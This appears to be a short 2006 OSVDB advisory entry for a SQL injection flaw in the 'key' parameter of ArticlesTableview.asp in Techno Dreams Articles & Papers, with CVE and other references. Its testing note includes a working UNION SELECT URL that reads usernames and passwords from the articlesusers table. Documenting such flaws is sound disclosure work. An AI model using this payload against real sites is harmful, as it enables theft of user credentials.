Techno Dreams Articles & Papers ArticlesTableview.asp key Variable SQL Injection

2006-09-17T09:33:53
ID OSVDB:28948
Type osvdb
Reporter OSVDB
Modified 2006-09-17T09:33:53

Description

Manual Testing Notes

/ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18

References:

Vendor URL: http://www.t-dreams.com/ Secunia Advisory ID:21976 Other Advisory URL: http://milw0rm.com/exploits/2386 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0286.html FrSIRT Advisory: ADV-2006-3682 CVE-2006-4891 Bugtraq ID: 20073